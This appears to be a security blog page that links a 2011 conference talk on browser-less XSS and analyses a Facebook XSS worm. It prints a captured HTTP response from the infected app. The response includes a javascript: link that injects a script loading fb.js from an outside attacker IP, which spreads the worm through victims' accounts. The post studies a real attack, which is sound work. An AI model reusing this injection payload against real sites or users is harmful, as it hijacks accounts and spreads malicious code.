Kos SecurityA blog about security.

Toorcon Seattle 2011, “XSS Without the Browser”

Toorcon Seattle 2011, “XSS Without the Browser” (PDF). Presentation I gave about embedded HTML/Javascript engines, and potential security risks with whe not implemented securely. An old Skype bug is used as an example.



Facebook XSS

Some cross-site scripting that was being spread on Facebook. I allowed myself to be compromised (for science!) and opened up a BURP instance beforehand. (Red link is to the actual javascript that sent out messages.)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.144.114.105
X-Cnection: close
Date: Thu, 07 Apr 2011 05:49:39 GMT
Content-Length: 121182

*SNIP*

                                <div>
                                        <div id="app205712022786034_permalink_header_alt" fbcontext="dc593d496581">
                                                <div>
                                                        <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><img src="http://i.imgur.com/dPewU.png" /></a>
                                                </div>
                                                <div>
                                                        <h2>Videos Posted by Maria Gonzales</h2>
                                                        <div>
                                                                <div>
                                                                </div>
                                                        </div>
                                                </div>
                                        </div>
                                        <div id="app205712022786034_player" style="border: 0px none #ffffff;" fbcontext="dc593d496581">
                                                <a href=" javascript:if(window.opener)&#123; window.opener.document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&amp;app_link=http://fb.me/TzCxMrJW&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous&#039;; window.close(); &#125;else&#123; document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&amp;app_link=http://fb.me/TzCxMrJW&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous&#039;; &#125;" target="_blank" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>
                                        </div>
                                        <div id="app205712022786034_video_info" fbcontext="dc593d496581">
                                                <div id="app205712022786034_video_metadata" fbcontext="dc593d496581">
                                                        <h3>Teacher Pushes Attacking Bully To The Ground</h3>
                                                        <div>
                                                                 by <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">Maria Gonzales</a> (<a href="/video/?id=" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">videos</a>)
                                                        </div>
                                                        <div>
                                                                <strong>2:30</strong><br /><br />
                                                        </div>
                                                </div>
                                                <div id="app205712022786034_description" fbcontext="dc593d496581">
                                                        <div>
                                                          He should be commended, but sadly, in todays world, he'll probably get in trouble. 
                                                        </div>
                                                </div>
                                                <a role="button" href="/ajax/share_dialog.php?s=&#039;11&amp;appid=2392950137&amp;p[]=487808128343&amp;p[]=&amp;p[]=" title="send this to friends or post it on your profile." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><span>Share</span></a>
                                                <div id="app205712022786034_video_actions" fbcontext="dc593d496581">
                                                        <ul>
                                                                <li>
                                                                <div>
                                                                        <a href="#" id="app205712022786034_lowqual_toggle" title="watch &quot;bonaparte - menschen live (video) [hd]&quot; in regular quality." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;" fbcontext="dc593d496581">
                                                                        View in Regular Quality</a>
                                                                </div>
                                                                <a href="#" id="app205712022786034_highqual_toggle" title="watch &quot;bonaparte - menschen live (video) [hd]&quot; in high quality." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;" fbcontext="dc593d496581">View in High Quality</a>
                                                                </li>
                                                                <li><a href="/ajax/report.php?content_type=&#039;13&amp;cid=487808128343&amp;h=AQDMzuGzYxeiGADv" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">Report Video</a></li>
                                                        </ul>
                                                </div>
                                        </div>

*SNIP*